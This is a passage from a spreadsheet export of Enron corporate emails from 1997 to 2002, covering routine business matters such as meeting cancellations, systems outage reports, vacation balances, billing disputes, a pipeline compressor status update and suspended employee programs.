    <t>frozenset({'m..love@enron.com', 'john.valdes@enron.com', 'a..allen@enron.com', 'c..gossett@enron.com', 'c..giron@enron.com', 'w..white@enron.com', 'russ.severson@enron.com', 'm.hall@enron.com', 's..theriot@enron.com', 'bryce.baxter@enron.com', 'angelo.miroballi@enron.com', 'rita.wynne@enron.com', 'mark.mcclure@enron.com', 'd..winfree@enron.com', 'greg.couch@enron.com', 'margaret.dhont@enron.com', 'errol.mclaughlin@enron.com', 'kam.keiser@enron.com', 'evelyn.aucoin@enron.com', 'scott.palmer@enron.com', 'leslie.reeves@enron.com'})</t>
  </si>
  <si>
    <t>RE: Netco meeting today</t>
  </si>
  <si>
    <t>The ever changing world of Enron_x000D_
_x000D_
John Lavorato would like to speak to you today.  So Please come to a meeting at 2:30_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hall, Bob M  _x000D_
Sent:	Friday, January 11, 2002 1:48 PM_x000D_
To:	Reeves, Leslie; Gossett, Jeffrey C.; White, Stacey W.; Keiser, Kam; Theriot, Kim S.; Baxter, Bryce; Wynne, Rita; Aucoin, Evelyn; Allen, Thresa A.; Mcclure, Mark; Miroballi, Angelo; Love, Phillip M.; Valdes, John; Severson, Russ; Dhont, Margaret; Winfree, O'Neal D.; Palmer, B. Scott; Giron, Darron C.; Couch, Greg; McLaughlin Jr., Errol_x000D_
Subject:	Netco meeting today_x000D_
_x000D_
I know we have moved this meeting already, but since I have very little info ( only what I read on Yahoo!)_x000D_
I think we should wait till next week to meet.  So I am going to cancel._x000D_
_x000D_
I have given Leslie, Jeff , Stacey and Rita,  Enron BUCKS cards.  Make them buy you a drink._x000D_
_x000D_
Let me know if you hear anything._x000D_
_x000D_
Thanks for you patients and continued understanding._x000D_
_x000D_
bob</t>
  </si>
  <si>
    <t>Fri, 4 Jan 2002 14:18:57 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mnlevy@swidlaw.com'})</t>
  </si>
  <si>
    <t>RE: Out of Office AutoReply: SEC Letter</t>
  </si>
  <si>
    <t xml:space="preserve">Michael,_x000D_
_x000D_
To follow up on my first message, I want to inform you that I decided_x000D_
to appear before the SEC investigators without a legal counsel. I simply feel_x000D_
that your highly competent help is not required in my case._x000D_
_x000D_
I want to thank you for the time you spent with me on Wednesday._x000D_
My only regret is that I shall have no opportunity to spend more time_x000D_
with you and learn from your experience._x000D_
_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Levy, Michael" &lt;MNLevy@SWIDLAW.com&gt;@ENRON  _x000D_
Sent:	Friday, January 04, 2002 3:28 PM_x000D_
To:	Kaminski, Vince J_x000D_
Subject:	Out of Office AutoReply: SEC Letter_x000D_
_x000D_
_x000D_
Michael Levy will be out of the office on business until on or about January 22, 2002.  He will have some limited access to e-mails and will respond as quickly as he can.  In addition, please feel free to contact his secretary, Megan Morgan, at (202) 295-8416, if you need to reach him immediately.  You may also leave him a voicemail at (202) 295-8414, and he will get back to you as soon as he can._x000D_
Thanks. </t>
  </si>
  <si>
    <t>Fri, 25 Jan 2002 18:18:55 -0800 (PST)</t>
  </si>
  <si>
    <t>Weekend Outage Report for 1/25/02-1/27/02</t>
  </si>
  <si>
    <t>_________________________________________________________________ _x000D_
_x000D_
WEEKEND SYSTEMS AVAILABILITY_x000D_
_x000D_
FOR_x000D_
_x000D_
1/25/2002 5:00:00 PM through 1/28/2002 12:00:00 AM _x000D_
_________________________________________________________________ _x000D_
_x000D_
_x000D_
Impact:   San Palo _x000D_
Time:   Thur 1/24/2002 12:00:00 PM CT thru Sun 1/27/2002 12:00:00 PM CT_x000D_
	Thur 1/24/2002 10:00:00 AM PT thru Sun 1/27/2002 10:00:00 AM PT_x000D_
	Thur 1/24/2002 6:00:00 PM London thru Sun 1/27/2002 6:00:00 PM London_x000D_
Outage:   New server room _x000D_
Environments Impacted:   File Server, Notes servers, Print Server, Internet access. _x000D_
Purpose:   Put 02 servers room in just 01 room. Rebuild all cabling (data and voice). This is set on CST. _x000D_
Backout:   Back to original room. _x000D_
Contact(s):   Nilson Busto  55-11-5503-1347_x000D_
_x000D_
_x000D_
Impact:   Corp _x000D_
Time:   Fri 1/25/2002 1:45:00 PM CT thru Fri 1/25/2002 2:45:00 PM CT_x000D_
	Fri 1/25/2002 11:45:00 AM PT thru Fri 1/25/2002 12:45:00 PM PT_x000D_
	Fri 1/25/2002 7:45:00 PM London thru Fri 1/25/2002 8:45:00 PM London_x000D_
Outage:   Change Management Emergency Outage _x000D_
Environments Impacted:   Change Management System Outage. _x000D_
Purpose:   Change Management Application needs emergency maintenance. _x000D_
Backout:   NA _x000D_
Contact(s):   Brennan, Ryan  713-853-4545_x000D_
	Ray, Edward  7138536744_x000D_
	Brooks, Sean L  713-345-8077</t>
  </si>
  <si>
    <t>Mon, 22 Apr 2002 12:02:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'daniel.quezada@enron.com'})</t>
  </si>
  <si>
    <t>RE: 2002 Vacation for Chris</t>
  </si>
  <si>
    <t>did you count the half day on 4/16 or all day on 4/19 or should we leave these as unofficial time?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Quezada, Daniel  _x000D_
Sent:	Monday, April 15, 2002 11:36 AM_x000D_
To:	Germany, Chris_x000D_
Subject:	RE: 2002 Vacation for Chris_x000D_
_x000D_
I didn't count 1/2-1/4;1/7; or 2/1 but actually you will have 1 1/2 day of vac left on unofficial vacation time..._x000D_
_x000D_
_x000D_
Daniel Quezada_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Germany, Chris  _x000D_
Sent:	Monday, April 15, 2002 11:06 AM_x000D_
To:	Quezada, Daniel_x000D_
Subject:	2002 Vacation for Chris_x000D_
_x000D_
2002 Vacation_x000D_
_x000D_
Rollover from 2001  	40 hours_x000D_
2002 credit	           160 hours_x000D_
Disc Holiday		  8 hours_x000D_
_x000D_
Total			208 hours = 26 days_x000D_
_x000D_
Vacation Days_x000D_
208	Beginning Balance_x000D_
_x000D_
8 hours Disc Holiday	Mon 2/11/02_x000D_
8 hours			Fri 3/15/02_x000D_
4 hours			Fri 3/22/02_x000D_
8 hours			Fri 3/29/02_x000D_
4 hours			Tue 4/16/02_x000D_
8 hours			Fri 4/19/02_x000D_
_x000D_
40 hours total_x000D_
_x000D_
168 hours remaining = 21.0 day</t>
  </si>
  <si>
    <t>Wed, 12 May 1999 08:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>1st Qtr 10-Q Outstanding PBC Request Items</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Tana Jones/HOU/ECT on 05/12/99 03:25 PM _x000D_
---------------------------_x000D_
From: Gail Tholen on 05/12/99 12:15 PM_x000D_
To: Tana Jones/HOU/ECT@ECT_x000D_
cc: Casey Evans/AA/Corp/Enron@Enron, Faith Killen/HOU/ECT@ECT _x000D_
Subject: 1st Qtr 10-Q Outstanding PBC Request Items_x000D_
_x000D_
Any word on the Nymex Letter?_x000D_
---------------------- Forwarded by Gail Tholen/HOU/ECT on 05/12/99 12:13 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Casey Evans@ENRON_x000D_
05/03/99 11:49 AM_x000D_
To: Georgeanne Hodges/HOU/ECT@ECT, Gail Tholen/HOU/ECT@ECT, Philippe _x000D_
Travis/HOU/ECT@ECT, Michael E Moscoso/HOU/ECT@ECT, Lindsay Long/HOU/ECT@ECT, _x000D_
Sheri Thomas/HOU/ECT@ECT, Kenneth W Walther/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: 1st Qtr 10-Q Outstanding PBC Request Items_x000D_
_x000D_
I am attaching a list of the 10-Q items that are still outstanding.  We would _x000D_
like to get this information as soon as possible as our deadline for final _x000D_
comments on the 10-Q is "scheduled" for May 10.  If you have any questions or _x000D_
foresee any problems in providing the information applicable to you or your _x000D_
group, please call me at 3-7230 or Jennifer Stevenson at 3-7230._x000D_
_x000D_
Thank you for your time._x000D_
_x000D_
Casey_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 25 Mar 2002 12:56:39 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris_germany61@hotmail.com'})</t>
  </si>
  <si>
    <t>http://homeadvisor.msn.com/pickaplace/comparecities.asp?TS=UT&amp;selFS=TX&amp;selTS=UT&amp;selFC=0&amp;selTC=0&amp;PFC=Houston&amp;PTC=San%20Francisco&amp;EarningFromCity=50000&amp;PFS=TX&amp;PTS=CA</t>
  </si>
  <si>
    <t>Wed, 16 Aug 2000 04:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: EOL Credit Responses 08/15/00</t>
  </si>
  <si>
    <t>Tana:_x000D_
_x000D_
The following CPs are not approved to trade US power products:_x000D_
_x000D_
Panamsat Corp. - restricted by credit_x000D_
Providence Gas Company - not a current CP/not Ferc approved_x000D_
Shell Chemical Co. - not a current CP/not Ferc approved_x000D_
_x000D_
Leslie</t>
  </si>
  <si>
    <t>Thu, 24 May 2001 15:09:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kalmeida@caiso.com'})</t>
  </si>
  <si>
    <t>frozenset({"p..o'neil@enron.com", 'chris.stokley@enron.com', 'donna.johnson@enron.com'})</t>
  </si>
  <si>
    <t>FW: Dispute Trade Dates 3/14/01-3/24/01</t>
  </si>
  <si>
    <t xml:space="preserve">Good news.  See e-mail below.  Epstein is our Controller.  Spence is our_x000D_
Director of Settlements.  Bill Regan is our Chief Financial Officer._x000D_
On another note, it has been requested that a detailed explanation be given_x000D_
and what will be done to prevent this in the future.  I hope you can_x000D_
understand the reasoning for this request._x000D_
_x000D_
Keoni Almeida_x000D_
California Independent System Operator_x000D_
phone: 916/608-7053_x000D_
pager:  916/814-7352_x000D_
alpha page:  9169812000.1151268@pagenet.net_x000D_
e-mail:  &lt;mailto:kalmeida@caiso.com&gt;_x000D_
_x000D_
_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	Epstein, Michael_x000D_
&gt; Sent:	Thursday, May 24, 2001 2:20 PM_x000D_
&gt; To:	Gerber, Spence; Woertz, Byron; Almeida, Keoni; Nelsen, Deanne_x000D_
&gt; Cc:	Perez, Glen; Regan, William; Iverson, Melodie_x000D_
&gt; Subject:	RE: Dispute Trade Dates 3/14/01-3/24/01_x000D_
&gt; Importance:	High_x000D_
&gt;_x000D_
&gt; The ISO would like Enron to pay the net amount after Spence has made his_x000D_
&gt; estimate of the corrected bill. We will not be able to tell Enron the_x000D_
&gt; amount until early next week. Keoni needs to inform Enron to pay the_x000D_
&gt; adjusted amount when Spence's estimate is complete._x000D_
&gt; </t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 00:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'glenn.wright@enron.com', 'heather.kroll@enron.com'})</t>
  </si>
  <si>
    <t>Re: Outstanding Issues</t>
  </si>
  <si>
    <t xml:space="preserve">Glenn,_x000D_
_x000D_
I had asked Jay and Clark to put together a closing checklist of the items _x000D_
you mention below. I know that Jay and George have been in communication with _x000D_
each other on the forms of some of those Exhibits.  _x000D_
_x000D_
A major incomplete item that is still in my "To Do" list is to develop the _x000D_
Renewal Period Pricing Formula Exhibit for the Steam Purchase Agreements from _x000D_
the notes Heather provided me. As soon as I'm done with the DASH and my Risk _x000D_
Memo, I'll turn to that task. _x000D_
_x000D_
Steve_x000D_
_x000D_
_x000D_
_x000D_
	Glenn Wright@ENRON_x000D_
	01/08/01 07:44 AM_x000D_
		_x000D_
		 To: Heather Kroll/HOU/ECT@ECT_x000D_
		 cc: Dwight Beach/HOU/ECT@ECT, Ozzie Pagan/HOU/ECT@ECT, Steve Van _x000D_
Hooser/HOU/ECT@ECT_x000D_
		 Subject: Re: Outstanding Issues_x000D_
_x000D_
One additional action item.  We need to make certain that all of the _x000D_
attachments and exhibits to the basic agreements between Enron and Alamac are _x000D_
in order and completed.  _x000D_
_x000D_
Your timeline for the interconnection agreements shows April 1 as the target _x000D_
date for the final agreement.  By what mechanism will we cap our exposure? _x000D_
_x000D_
-glenn_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Heather Kroll@ECT_x000D_
01/07/2001 03:59 PM_x000D_
To: Dwight Beach/HOU/ECT@ECT, Ozzie Pagan/HOU/ECT@ECT, Glenn _x000D_
Wright/Corp/Enron@ENRON, Steve Van Hooser/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Outstanding Issues_x000D_
_x000D_
To all:_x000D_
_x000D_
I've put together a list of outstanding issues that need to be resolved prior _x000D_
to the Jan 19 closing.  Let me know if I've forgotten anything._x000D_
_x000D_
I'll be out of the office Monday through Wednesday, but can be reached by my _x000D_
cell phone (713.569.1131) or pager (888.472.7841).  Also, I'll be working out _x000D_
of the NY office all day on Tuesday._x000D_
_x000D_
Regards,_x000D_
_x000D_
Heather_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 04:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gerald.nemec@enron.com', 'william.bradford@enron.com', 'steve.hooser@enron.com'})</t>
  </si>
  <si>
    <t>Libor + 200 in Spread Value Calc.</t>
  </si>
  <si>
    <t xml:space="preserve">Bill, the language that we have used for discounting had a 200 basis point _x000D_
amount attached to it. It should not be included based on our last _x000D_
conversation.. If this is going to be attached as a schedule  then it still _x000D_
needs to go through some changes. _x000D_
_x000D_
The calculation, summary page is almost complete.  _x000D_
_x000D_
BT . </t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 08:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rob.bradley@enron.com'})</t>
  </si>
  <si>
    <t>Remarks to EES Employees--December 1</t>
  </si>
  <si>
    <t xml:space="preserve">You have been asked to make some brief remarks on the changes at Enron at the _x000D_
EES employee meeting next Friday, and I put together the attached as a _x000D_
potential framework.  It provides an Enron problem list of 1985/86 versus _x000D_
today and a brief look at our different visions._x000D_
_x000D_
If I can do something else, I'll be back Monday morning and will be happy to _x000D_
do so._x000D_
_x000D_
- Rob_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 06:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jill.lafave@enron.com', 'john.swinney@enron.com', 'richard.cross@enron.com', 'matt.brown@enron.com'})</t>
  </si>
  <si>
    <t>January 11 - Managing Operational Risk</t>
  </si>
  <si>
    <t xml:space="preserve">Please join me on Thursday, January 11 from 1:00 to 4:00 pm for a special _x000D_
information session for the Operations Management teams supporting Enron _x000D_
Americas, Enron Global Markets and Enron Industrial Markets.   We will focus _x000D_
on assessing, managing and mitigating operational risk.  Details on the _x000D_
location for the meeting will be sent to you early this week.  _x000D_
_x000D_
I look forward to seeing everyone at this meeting on the 11th.  The things _x000D_
that we will discuss will be important for each and every one of you as you _x000D_
carry out your roles in 2001.  I hope that you will make every effort to _x000D_
attend.  Please let me know as soon as possible if you have a conflict that _x000D_
will keep you from attending the meeting.      </t>
  </si>
  <si>
    <t>Wed, 3 May 2000 03:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Gallup - Status Update, May 4, AM</t>
  </si>
  <si>
    <t xml:space="preserve">Please call when you've reviewed this.  Thanks. DF_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 05/03/2000=20_x000D_
10:36 AM ---------------------------_x000D_
  =20_x000D_
=09_x000D_
=09_x000D_
=09From:  Susan Scott                           05/03/2000 08:46 AM_x000D_
=09_x000D_
_x000D_
To: Drew Fossum@ENRON, Donna Martens/ET&amp;S/Enron@ENRON_x000D_
cc: =20_x000D_
_x000D_
Subject: Gallup - Status Update, May 4, AM_x000D_
_x000D_
FYI_x000D_
---------------------- Forwarded by Susan Scott/ET&amp;S/Enron on 05/03/2000=20_x000D_
08:44 AM ---------------------------_x000D_
_x000D_
_x000D_
James Pfeffer@ENRON_DEVELOPMENT_x000D_
05/03/2000 08:00 AM_x000D_
To: Michel Nelson/ET&amp;S/Enron@ENRON, John R Keller/OTS/Enron@Enron, Ray=20_x000D_
Smith/ET&amp;S/Enron@ENRON, Lorraine Lindberg/ET&amp;S/Enron@ENRON, Arnold L=20_x000D_
Eisenstein/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Steven=20_x000D_
Harris/ET&amp;S/Enron@ENRON, James Pfeffer/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=_x000D_
=20_x000D_
Rich Jolly/ET&amp;S/Enron@ENRON, Jeffery Fawcett/ET&amp;S/Enron@ENRON, Rich=20_x000D_
Plachy/Enron Communications@Enron Communications, David=20_x000D_
Roensch/ET&amp;S/Enron@ENRON, Team Gallup/ET&amp;S/Enron@ENRON, Ronald=20_x000D_
Matthews/ET&amp;S/Enron@ENRON, Earl Chanley/ET&amp;S/Enron@Enron, Vera=20_x000D_
Jones/ET&amp;S/Enron@ENRON, Brian H Mellon/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT,=_x000D_
=20_x000D_
John G Keller@EES, Phil Lowry@ENRON, Darrell Schoolcraft@ENRON, Susan=20_x000D_
Scott@ENRON, Kevin Hyatt@ENRON_x000D_
cc: =20_x000D_
_x000D_
Subject: Gallup - Status Update, May 4,  AM_x000D_
_x000D_
The suction strainer was removed last night.  The piping spool was=20_x000D_
reinstalled without the major compressor alignment problems that were=20_x000D_
expected.  This significantly reduced the downtime necessary for the remova=_x000D_
l=20_x000D_
of the suction strainer._x000D_
_x000D_
No major foreign materials were found in the strainer.  Some small weld bea=_x000D_
ds=20_x000D_
were found.  There were some signs that the strainer may have been vibratin=_x000D_
g._x000D_
_x000D_
Several compressor test runs were made early this AM to measure the vibrati=_x000D_
on=20_x000D_
levels without the suction strainer.  The high frequency vibration was=20_x000D_
reduced to safe levels.  There is no longer any risk to the unit piping=20_x000D_
integrity._x000D_
_x000D_
The compressor bearing vibration did not decrease due to the removal of the=_x000D_
=20_x000D_
strainer.  Rolls will continue to assess the collected vibration data to=20_x000D_
determine the cause of the high drive end bearing vibration and construct a=_x000D_
=20_x000D_
game plan._x000D_
_x000D_
The station once again became available for service around 4 AM.  The=20_x000D_
compressor may or may not be run dependent on need.  Gallup Ops and Gas=20_x000D_
Control are in close contact._x000D_
_x000D_
The station will be manned if the compressor is running due to Gas Control=_x000D_
=20_x000D_
being unable to send remote setpoints to the station controller.  The probl=_x000D_
em=20_x000D_
stems from OPTO-22 not supporting the particular Modbus function required t=_x000D_
o=20_x000D_
send setpoints.  This is a =01+lack of functionality=01, in the new LCM4 ve=_x000D_
rsion=20_x000D_
controllers/software utilized on the Gallup Project. =20_x000D_
_x000D_
EECC has been in contact with OPTO-22 to determine the time table for=20_x000D_
resolving this problem.  EECC, TW Ops are working on a temporary fix to=20_x000D_
enable Gas Control to send remote setpoints to Gallup.  Gas Control is=20_x000D_
currently able to monitor data from Gallup._x000D_
_x000D_
Some instrumentation will be replaced today that failed due to the high=20_x000D_
vibration over the fast few days._x000D_
_x000D_
Final tuning of the station control loops and surge control will be also be=_x000D_
=20_x000D_
conducted today._x000D_
_x000D_
James Pfeffer_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Oct 1997 00:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Breakfast presentation at MASS Plastics '97 conference, per_x000D_
 Jennifer Arnold.</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
CANCELLED......</t>
  </si>
  <si>
    <t>Further information regarding Gov Thompson</t>
  </si>
  <si>
    <t>Sue Landwehr in government affairs spoke to a member of the Thompson _x000D_
administration who indicated that the governor may be interested in talking _x000D_
to you about Amtrak.  Specifically, ECT has been working with Amtrak for _x000D_
quite some time on an electricity</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 07:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Brazos Valley Project LP Interconnect Agreement</t>
  </si>
  <si>
    <t>Greg,_x000D_
_x000D_
Attached for your review and further handling the Draft Interconnect _x000D_
Agreement with Brazos Valley Project, L.P. and HPL._x000D_
_x000D_
 _x000D_
_x000D_
Thanks &amp; have a great weekend,_x000D_
_x000D_
Eric Gillaspie_x000D_
713-345-7667_x000D_
Enron Building 3886</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 15:02:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Old Desk Chairs (does not include 'old' Aeron chairs currently_x000D_
 on the floor)</t>
  </si>
  <si>
    <t>I would like to enter the drawing for one of the leather type chairs._x000D_
_x000D_
Thank You,_x000D_
Holden_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Fitzpatrick, Amy  _x000D_
Sent:	Thursday, May 31, 2001 1:50 PM_x000D_
To:	Portland West Desk_x000D_
Subject:	Old Desk Chairs (does not include 'old' Aeron chairs currently on the floor)_x000D_
_x000D_
We will be selling the old desk chairs to employees for $25.00.  If you are interested in purchasing a non-Aeron chair currently on the floor, please let me know by close of business, Monday, June 4.  On Tuesday morning, we will hold a drawing to allocate the available chairs.  _x000D_
_x000D_
Just a reminder - we will be replacing desk chairs after 2:00 pm on Monday, June 4 and Tuesday, June 5.  If you are happy with your current chair and do not wish to have it replaced or have special requests, please let me know as soon as possible.  Please disregard if you have already responded._x000D_
_x000D_
Thanks!_x000D_
Amy</t>
  </si>
  <si>
    <t>Wed, 7 Nov 2001 10:10:26 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: CA Extenstions/Amendments</t>
  </si>
  <si>
    <t xml:space="preserve">thanks.  this is really important to the restructures we are working on._x000D_
_x000D_
_x000D_
From:	Susan J Mara/ENRON@enronXgate on 11/07/2001 12:07 PM_x000D_
To:	Mike D Smith/HOU/EES@EES, Jeff Dasovich/ENRON@enronXgate, James D Steffes/ENRON@enronXgate_x000D_
cc:	Lamar Frazier/HOU/EES@EES, Jeremy Blachman/ENRON@enronxgate _x000D_
Subject:	RE: CA Extenstions/Amendments_x000D_
_x000D_
SCE and PG&amp;E have raised these questions.  The questions came up at a meeting with the utilities on Oct 2 and again on OCt 25 -- SCE went so far as to say that in a response filed last week, I believe. The questions arise because, once you have a date cutting off direct access -- what can be allowed thereafter and what can't?  Once DA, always DA? (we say) What consitutes a written DA "contract".  (the utilities ask) You'd think the utilities would have better things to spend their time on.  Actually, SCE most likely benefits (pays off its debts sooner) if it can capture more customers. These are similar to issues Commissioner Wood is investigating and may result in a decision along those lines that goes to the Commission for a vote.  We are opposing as are 95% of the customer groups.  A pre-hearing conf is being held at 2 pm today with Wood's friendly ALJ to talk further about these type of issues.  I will keep you apprised._x000D_
_x000D_
Sue_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Smith, Mike  _x000D_
Sent:	Wednesday, November 07, 2001 9:47 AM_x000D_
To:	Dasovich, Jeff; Mara, Susan; Steffes, James D._x000D_
Cc:	Frazier, Lamar; Blachman, Jeremy_x000D_
Subject:	CA Extenstions/Amendments_x000D_
_x000D_
I heard that the CPUC and/or the utilities have taken the position that any amendment to a contract after 9/20, like a pricing amendment, is a new contract entered after 9/20 and therefore invalid.  Is this true?  Does this hold any water?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Jun 2002 13:31:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'anthony_carroll@americas.bnpparibas.com'})</t>
  </si>
  <si>
    <t>BNP Paribas Commodity Futures NG MarketWatch for 06/13/02</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
(See attached file: ng061302.pdf)_x000D_
_x000D_
_x000D_
This message and any attachments (the "message") is_x000D_
intended solely for the addressees and is confidential. _x000D_
If you receive this message in error, please delete it and _x000D_
immediately notify the sender. Any use not in accord with _x000D_
its purpose, any dissemination or disclosure, either whole _x000D_
or partial, is prohibited except formal approval. The internet_x000D_
can not guarantee the integrity of this message. _x000D_
BNP PARIBAS (and its subsidiaries) shall (will) not _x000D_
therefore be liable for the message if modified. _x000D_
_x000D_
                ---------------------------------------------_x000D_
_x000D_
Ce message et toutes les pieces jointes (ci-apres le _x000D_
"message") sont etablis a l'intention exclusive de ses _x000D_
destinataires et sont confidentiels. Si vous recevez ce _x000D_
message par erreur, merci de le detruire et d'en avertir _x000D_
immediatement l'expediteur. Toute utilisation de ce _x000D_
message non conforme a sa destination, toute diffusion _x000D_
ou toute publication, totale ou partielle, est interdite, sauf _x000D_
autorisation expresse. L'internet ne permettant pas _x000D_
d'assurer l'integrite de ce message, BNP PARIBAS (et ses_x000D_
filiales) decline(nt) toute responsabilite au titre de ce _x000D_
message, dans l'hypothese ou il aurait ete modifie.</t>
  </si>
  <si>
    <t>Thu, 3 May 2001 09:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Price Reservations 2 May 2001 Real-Time Market and 3 May 2001 Day_x000D_
	-Ahead Market</t>
  </si>
  <si>
    <t xml:space="preserve">CGoering@nyiso.com writes to the NYISO_TECH_EXCHANGE Discussion List:_x000D_
_x000D_
The NYISO is reserving hours beginning 00:00 - 23:00 in the May 2, 2001_x000D_
Real-Time Market as well as the following hours per ECA20001006B to verify_x000D_
prices:_x000D_
_x000D_
PJM: 01:00 - 03:00, 05:00, 08:00, 21:00, 22:00_x000D_
OH:  05:00, 08:00, 21:00, 22:00_x000D_
HQ:  05:00, 07:00, 08:00, 21:00, 22:00_x000D_
NE:  03:00 - 06:00, 08:00, 13:00, 21:00 - 23:00_x000D_
_x000D_
Prices in the May 3, 2001 Day-Ahead Market are correct._x000D_
_x000D_
This e-mail information is a copy of the official posting which can be found _x000D_
at_x000D_
the following address on our website:_x000D_
http://mis.nyiso.com/public/htm/OperMessages/CurrentOperMessages.htm#mm_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 08:15:25 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'h..fletcher@enron.com'})</t>
  </si>
  <si>
    <t>TETCO invoice - October production</t>
  </si>
  <si>
    <t>Contract 910262, Deal # 1072014_x000D_
_x000D_
Pipe invoiced a demand rate of .035 ($1.085) on volume of 20,000.  The rate in Sitara is .03.  The amount of variance is  $3,100._x000D_
_x000D_
Which is correct?_x000D_
_x000D_
Thanks,_x000D_
Brenda</t>
  </si>
  <si>
    <t>Wed, 21 Nov 2001 08:16:54 -0800 (PST)</t>
  </si>
  <si>
    <t>Program Changes</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
As you know, this is an unprecedented time in Enron's history.  We must adapt our employee programs to fit the immediate needs of our company during this time of transition.  It is especially difficult to announce the immediate suspension of the following programs._x000D_
_x000D_
?	ClickAtHome - Enron has suspended the ClickAtHome program.  The program will no longer accept new participants, PC orders, or Internet service orders.  Orders submitted and confirmed prior to November 20, 2001 will be honored.  Enron will also discontinue subsidized Internet service.  Effective January 1, 2002, employees who are currently subscribers to subsidized Internet service will be switched to the regular commercial rate of their service provider and be responsible for the entire cost of the service._x000D_
?	Matching Gifts and Volunteer Incentive Program (VIP) - Enron's Matching Gift program and VIP grants have been suspended indefinitely.  As we consider the immediate needs of all employees during this trying time, it is appropriate that we discontinue the dollar for dollar match for charitable contributions as well as cash donations recognizing employees' volunteer hours with non-profit organizations.  Matching Gift or VIP submissions received prior to November 20 will be honored._x000D_
_x000D_
We regret that we have had to make these changes.  We must continue to look for ways to reduce operating expenses through this transition period._x000D_
  </t>
  </si>
  <si>
    <t>Fri, 15 Feb 2002 08:21:54 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Notification Address</t>
  </si>
  <si>
    <t>Please call.  I don't understand your message._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Dicarlo, Louis  _x000D_
Sent:	Friday, February 15, 2002 10:12 AM_x000D_
To:	Shackleton, Sara_x000D_
Subject:	Notification Address_x000D_
_x000D_
Please provide notification address for CPs who want to communicate in writing with Enron estate._x000D_
_x000D_
Thanks_x000D_
_x000D_
Louis R. DiCarlo_x000D_
ENA Gas Structuring_x000D_
Phone: 713-345-4666_x000D_
Email: louis.dicarlo@enron.com</t>
  </si>
  <si>
    <t>Fri, 8 Sep 2000 11:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dpeppers@flashfind.com'})</t>
  </si>
  <si>
    <t>Reschedule appointment</t>
  </si>
  <si>
    <t>Ms. Peppers, I am very sorry, but I must once again reschedule the _x000D_
appointment that you have with Mr. Lay.  He will be out of town the entire _x000D_
week of September 26.  _x000D_
_x000D_
The first available time to reschedule is October 19, 2000.  Would an _x000D_
afternoon appointment work for you - about 2:00 p.m.?_x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
Rosalee</t>
  </si>
  <si>
    <t>Mon, 10 Jul 2000 04:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'becky.tlucek@enron.com', 'tana.jones@enron.com', 'chaundra.woods@enron.com', 'kaye.ellis@enron.com', 'sara.shackleton@enron.com', 'erica.braden@enron.com', 'carol.clair@enron.com', 'brenda.whitehead@enron.com', 'suzanne.adams@enron.com', 'taffy.milligan@enron.com', 'mary.cook@enron.com', 'susan.bailey@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Moving; out of office</t>
  </si>
  <si>
    <t>1.  I am told that sometime this afternoon I will be moved to 3880d -- that _x000D_
is the cubicle directly across from Shari Stack's office._x000D_
_x000D_
2.  I may be out of the office all day Tuesday and a half-day Wednesday.  I _x000D_
am going to try to get in the derivatives seminar for those dates.  If I am _x000D_
not in my new location at all tomorrow, that means I succeeded in getting _x000D_
